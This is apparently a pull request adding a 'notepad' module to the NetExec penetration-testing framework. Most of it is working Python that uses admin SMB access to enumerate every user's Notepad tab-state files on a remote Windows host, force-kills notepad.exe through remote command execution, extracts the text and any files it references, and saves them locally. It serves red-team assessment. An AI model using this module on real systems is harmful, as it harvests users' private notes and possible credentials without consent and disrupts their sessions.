### PR TITLE
New SMB Module Notepad

### DIFF
--- a/nxc/modules/notepad.py
+++ b/nxc/modules/notepad.py
@@ -7,7 +7,7 @@ from nxc.paths import NXC_PATH
 
 class NXCModule:
     # Extracts content from Windows Notepad binary tab state files
-    # Module by @YourUsername
+    # Module by @termanix
     name = "notepad"
     description = "Extracts content from Windows Notepad tab state binary files."
     supported_protocols = ["smb"]

--- a/nxc/modules/notepad.py
+++ b/nxc/modules/notepad.py
@@ -1,0 +1,148 @@
+from io import BytesIO
+from os import makedirs
+from os.path import join, abspath
+import re
+import time
+from nxc.paths import NXC_PATH
+
+class NXCModule:
+    # Extracts content from Windows Notepad binary tab state files
+    # Module by @YourUsername
+    name = "notepad"
+    description = "Extracts content from Windows Notepad tab state binary files."
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+    false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
+    FILE_PATH_REGEX = r"^[A-Za-z]:\\(?:[^<>:\"/\\|?*]+\\)*[^<>:\"/\\|?*]+\.[\w]{1,5}$"
+
+    def __init__(self, context=None):
+        self.context = context
+
+    def options(self, context, module_options):
+        """"""
+
+    def extract_strings(self, data, min_length=4):
+        """Extract printable strings from binary data, similar to the strings command."""
+        results = []
+        
+        # ASCII strings extraction
+        ascii_strings = re.findall(b"[ -~]{%d,}" % min_length, data)
+        for s in ascii_strings:
+            try:
+                results.append(("ASCII", s.decode("ascii")))
+            except Exception as e:
+                self.context.log.fail(f"Failed extracting ASCII strings: {e}")
+            
+        # UTF-16LE strings extraction (common in Windows)
+        utf16_pattern = re.compile(b"(?:[\x20-\x7E]\x00){%d,}" % min_length)
+        utf16_strings = utf16_pattern.findall(data)
+        for s in utf16_strings:
+            try:
+                decoded = s.decode("utf-16-le")
+                results.append(("UTF-16LE", decoded))
+            except Exception as e:
+                self.context.log.fail(f"Failed extracting UTF-16LE strings: {e}")
+        
+        return results
+
+    def is_meaningful_content(self, string):
+        """Check if a string has meaningful content."""
+        # Filter out strings that are just repetitions of the same character
+        if len(set(string)) <= 2 and len(string) > 4:
+            return False
+        
+        # Filter out strings that don't have any letters or numbers
+        if not any(c.isalnum() for c in string):
+            return False
+        
+        # Filter out strings that look like memory addresses or hex dumps
+        if re.match(r"^[0-9A-F]+$", string) and len(string) >= 8:
+            return False
+        
+        # Filter out strings that are just whitespace or control characters
+        if string.isspace():
+            return False
+        
+        # Filter out common binary file markers that aren't actual content
+        common_garbage = ["NULL", "true", "false", "xmlns", "http://", "https://", "COM1", "COM2", "COM3"]
+        if string in common_garbage:
+            return False
+            
+        return True
+
+    def read_and_decode_file(self, connection, file_path):
+        buf = BytesIO()
+        connection.conn.getFile("C$", file_path, buf.write)
+        buf.seek(0)
+        binary_data = buf.read()
+        
+        # Extract meaningful strings
+        return [(encoding, string) for encoding, string in self.extract_strings(binary_data) 
+                if self.is_meaningful_content(string)]
+
+    
+    def on_admin_login(self, context, connection):
+        found = 0
+        context.log.display("Searching for Notepad cache...")
+        for directory in connection.conn.listPath("C$", "Users\\*"):
+            if directory.get_longname() not in self.false_positive and directory.is_directory():
+
+                # Path for Windows Notepad tab state files
+                notepad_dir = f"Users\\{directory.get_longname()}\\AppData\\Local\\Packages\\Microsoft.WindowsNotepad_8wekyb3d8bbwe\\LocalState\\TabState\\"
+                try:
+                    if not connection.conn.listPath("C$", f"{notepad_dir}\\*"):
+                        continue
+                    connection.execute("cmd.exe /c taskkill /IM notepad.exe /F")  # If notepad.exe open by user, needs to kill that process for reading files.
+                    time.sleep(1)  # Sleep 1 sec for finding and reading processing
+                    try:
+                        for file in connection.conn.listPath("C$", f"{notepad_dir}\\*"):
+                            if file.get_longname() not in self.false_positive and file.get_longname().endswith(".bin"):
+                                file_path = f"{notepad_dir}{file.get_longname()}"
+                                
+                                # Read the binary file
+                                meaningful_strings = self.read_and_decode_file(connection, file_path)
+
+                                if meaningful_strings:
+                                    found += 1
+                                    context.log.highlight(f"C:\\{file_path}")
+
+                                    # Output content
+                                    content_lines = []
+                                    
+                                    # First loop to handle meaningful strings
+                                    for _, string in meaningful_strings:
+                                        if bool(re.match(self.FILE_PATH_REGEX, string)):  # Only needed if checking locally
+                                            # Read the file into a buffer
+                                            meaningful_strings = self.read_and_decode_file(connection, string[2:])
+
+                                            # Second loop to handle content inside the file
+                                            for _, string in meaningful_strings:
+                                                context.log.highlight(f"\t{string}")
+                                                content_lines.append(string)  # Store the string value only
+                                        else:
+                                            context.log.highlight(f"\t{string}")
+                                            content_lines.append(string)  # Store the string value only
+                                    
+                                    # Save to file
+                                    filename = f"{connection.host}_{directory.get_longname()}_notepad_tabstate_{found}.txt"
+                                    export_path = join(NXC_PATH, "modules", "notepad")
+                                    path = abspath(join(export_path, filename))
+                                    makedirs(export_path, exist_ok=True)
+
+                                    try:
+                                        with open(path, "w+") as output_file:
+                                            output_file.write(f"Source: C:\\{file_path}\n\n")
+                                            output_file.write("\n".join(content_lines))  # Write strings line by line
+                                        context.log.highlight(f"Notepad tab state content written to: {path}")
+                                    except Exception as e:
+                                        context.log.fail(f"Failed to write Notepad tab state to {filename}: {e}")
+
+                    except Exception as e:
+                        context.log.fail(f"Failed on connection and reading bin files: {e}")
+                        context.log.debug(f"Failed: {e}")
+                except Exception as e:
+                    context.log.fail(f"{directory.get_longname()} User has no any notepad cache file")
+                    context.log.debug(f"Failed for user {directory.get_longname()}: {e}")
+        if found == 0:
+            context.log.info("No Notepad tab state files with meaningful content found")


### PR DESCRIPTION
## Description

In the new feature of Notepad in Windows 11, data is kept saved until the file is closed. With this module, the contents of all saved notepad files are dumped.

## Type of change
Please delete options that are not relevant.
- [x] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?
Testen on local Windows 10 and 11

If you are using poetry, you can easily run tests via:
`poetry run nxc $TARGET -u $USER -p $PASSWORD -M notepad`

## Screenshots (if appropriate):

![image](https://github.com/user-attachments/assets/23e44846-64d0-4f38-b860-51329b428ad1)

## Checklist:

- [x] I have ran Ruff against my changes (via poetry: `poetry run python -m ruff check . --preview`, use `--fix` to automatically fix what it can)
- [x] I have added or updated the tests/e2e_commands.txt file if necessary
- [x] New and existing e2e tests pass locally with my changes
- [x] My code follows the style guidelines of this project (should be covered by Ruff above)
- [x] If reliant on third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
